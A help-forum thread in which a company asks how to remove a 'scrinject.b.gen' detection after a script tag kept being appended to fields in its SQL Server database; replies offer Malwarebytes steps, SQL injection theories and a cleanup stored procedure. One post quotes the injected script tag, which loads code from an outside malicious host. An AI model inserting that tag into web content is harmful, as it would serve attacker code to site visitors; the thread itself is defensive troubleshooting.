chongbenkee (Malaysia) asked in Malware/Spyware Removal:

How do I get rid of scrinject.b.gen?
PeteTheOwl (Australia):

Try this guide:

http://blog.teesupport.com/guides-to-remove-htmlscrinject-b-gen-infection-efficiently-and-completely/

Out of curiosity, how did you know you had it and what A-V are you using?
chongbenkee (asker):

I have viewed the particular log. I did not follow through because I would need to clean ("delete?") some system files. I did start the chat.... but the support personnel requested direct access to my web server. A bit worried about that.... especially as it is our one and only Corporate Web and Application server. Cannot afford to "damage" it.

It actually added "hyperlink script" in a text field in my MS SQL Server database.

It was detected by ESET NOD32. For some unknown reason, only ESET is "more" aware of this malware.

masteripper:

malwarebytes in safemode

younghv:

@masteripper - I think this is a question about a server based situation. If true, no one should be using ComboFix on it (workstation OS only).

@chongbenkee - Please give us some more details about the platform OS and what steps you have taken. Until we know more about your situation, we can only make guesses about what steps you should take.
chongbenkee (asker):

I have asked around and searched for a solution on the net. Couldn't find a specific "removal tool" yet. Personally, the "acceptable" options are by teesupport and cleanpc, but.... teesupport needs to access my Web server, whilst the cleanpc system does not support Win2000.

I have installed Malwarebytes on both my Web and Database servers. The malware was not detected on either Win 2K server.

Additional clarification:
- Only detected by ESET. No issue for non-ESET users.
- Once detected, user access to our in-house system (developed in VB+ASP+C++) is terminated.
- The only "infection" detected thus far is that a common script ".......<script..................." is inserted at the end of the contents in some of the fields in one of our tables. Our temporary solution is to use a SQL command to periodically detect the changes and automatically remove the inserted ".......<script...................". It works well thus far. I will try to get the exact script inserted and post it ASAP.
- Installed Malwarebytes on both Web and Database servers because we are not sure which server is infected.

It is still manageable because we only have a few ESET users, and the "detected" infection thus far is only the insertion of the script into a few "non-critical" fields.

Hope someone out there can help to sort this out sooner than later. Thanks in advance.
This SQL insertion could mean there is an infected machine somewhere on your network, or that SQL ports are open to the outside world.
Download Malwarebytes Anti-Malware and save it to your desktop.

MBAM may "make changes to your registry" as part of its disinfection routine. If using other security programs that detect registry changes (i.e. Spybot's TeaTimer), they may interfere or alert you. Temporarily disable such programs or permit them to allow the changes.

1. Make sure you are connected to the Internet.
2. Double-click on mbam-setup.exe to install.
3. When the installation begins, follow the prompts and do not change the default settings.
4. When installation has finished, leave both of these checked:
   - Update Malwarebytes' Anti-Malware
   - Launch Malwarebytes' Anti-Malware
   Then click Finish.
5. MBAM will automatically start and you will be asked to update the program before performing a scan.
6. If an update is found, it will install. Press the OK button to close that box and continue.
7. If you encounter any problems while downloading the definition updates, manually download the updates and just double-click on mbam-rules.exe to install.
8. On the Scanner tab, make sure the "Perform Full Scan" option is selected, then click on the Scan button.
9. If asked to select the drives to scan, leave all the drives selected and click on the Start Scan button.
10. The scan will begin and "Scan in progress" will show at the top. It may take some time to complete, so please be patient.
11. When the scan is finished, a message box will say "The scan completed successfully. Click 'Show Results' to display all objects found". Click OK to close the message box and continue with the removal process.
12. Back at the main Scanner screen, click on the Show Results button to see a list of any malware that was found.
13. Make sure that everything is checked, and click Remove Selected.
14. When removal is completed, a log report will open in Notepad. The log is automatically saved and can be viewed by clicking the Logs tab in MBAM.
15. Copy and paste the contents of that report in your next reply. Be sure to post the complete log, including the top portion which shows MBAM's database version and your operating system.
16. Exit MBAM when done and post your log file.

Thanks to BleepingComputer.com for the detailed instructions on how to install Malwarebytes.
>>>> it is our 1 and only Corporate Web and Application server

Is the server/web site published to be accessed from outside?

If it is, then it is possible that the hackers gained access through the website and exploited the server through SQL injection, then uploaded a shell, then uploaded files and lastly executed the files (malware/virus etc.) to insert the text.

Further could you post the logs or screenshot of logs from the ESET as well?
The problem is temporarily managed using the SQL command, i.e. the "additional" script appended to the data is automatically detected and deleted. No harm done thus far.

Meanwhile, still dreaming of a "fast and easy" solution to kill scrinject.b.gen!!

Also, Mozilla, Chrome, Safari, etc. will prompt a similar warning message (attachment), but not IE. Still trying to "remove" our URL from Google's "Safe Browsing" security list.

Is there any website which is publicly available which we can analyze?

Sudeep
The script detected by Google Webmaster :
<script src="http://eighbo02rsbarr.rr.nu" target="_blank" onmouseover="javascript:this.style.color='red'" onmouseout="javascript:this.style.color='#A24015'" style="text-decoration: none; color: #A24015; FONT-SIZE: 11px; FONT-FAMILY: 'arial'">

However, the "script" is currently automatically detected and deleted via our SQL command (stored procedure), set to run hourly. In other words, Google Webmaster will not find the script anymore unless the crawl happens during the hourly gap.

The "attack" seems to have "slowed down"......... the previous attack was on 1 Sept 2012.
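The hourly detect-and-strip stored procedure the asker describes, written out here as an added T-SQL example (it is not the asker's actual code): dbo.Articles, ArticleId and Body are placeholder names for the real table, the column is assumed to be varchar/nvarchar, legitimate content is assumed never to contain a "<script" tag, and the audit table is an addition so the removed payload and the time it was seen are kept as evidence rather than silently discarded.

```sql
-- Added example, not the asker's stored procedure. Placeholder names:
-- dbo.Articles / ArticleId / Body stand in for the affected table and column.
-- Assumes SQL Server 2005+ (NVARCHAR(MAX)) and the default case-insensitive
-- collation, so PATINDEX('%<script%', ...) also matches "<SCRIPT".
CREATE TABLE dbo.ScriptCleanupLog (
    LogId      INT IDENTITY(1,1) PRIMARY KEY,
    ArticleId  INT           NOT NULL,
    DetectedAt DATETIME      NOT NULL,
    Payload    NVARCHAR(MAX) NOT NULL   -- the injected tag, kept as evidence
);
GO

CREATE PROCEDURE dbo.usp_StripInjectedScript
AS
BEGIN
    SET NOCOUNT ON;
    BEGIN TRANSACTION;   -- log and strip the same set of rows

    -- 1. Record every affected row before changing it. The payload and the
    --    timestamp show when injections happen, which the cleanup alone hides.
    INSERT INTO dbo.ScriptCleanupLog (ArticleId, DetectedAt, Payload)
    SELECT ArticleId,
           GETDATE(),
           SUBSTRING(Body, PATINDEX('%<script%', Body), LEN(Body))
    FROM dbo.Articles
    WHERE PATINDEX('%<script%', Body) > 0;

    -- 2. Truncate the field just before the tag: the script is appended at the
    --    end of the content, so everything from "<script" onward is payload.
    UPDATE dbo.Articles
    SET Body = LEFT(Body, PATINDEX('%<script%', Body) - 1)
    WHERE PATINDEX('%<script%', Body) > 0;

    COMMIT TRANSACTION;
END
GO

-- Read-only check, e.g. before the first run or to see how often rows reappear:
-- lists the rows currently carrying the tag and the start of its src attribute.
SELECT ArticleId,
       SUBSTRING(Body, PATINDEX('%src="%', Body) + 5, 60) AS SrcStart
FROM dbo.Articles
WHERE PATINDEX('%<script%', Body) > 0;
```

Schedule the procedure as a SQL Server Agent job; the log table then shows whether new rows keep appearing between runs, which is the evidence the other replies ask for when judging whether the writes come from the website or from another machine on the network.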
ASKER CERTIFIED SOLUTION

chongbenkee (Malaysia):

No cure for now. Been too long. Will re-look into this only if necessary.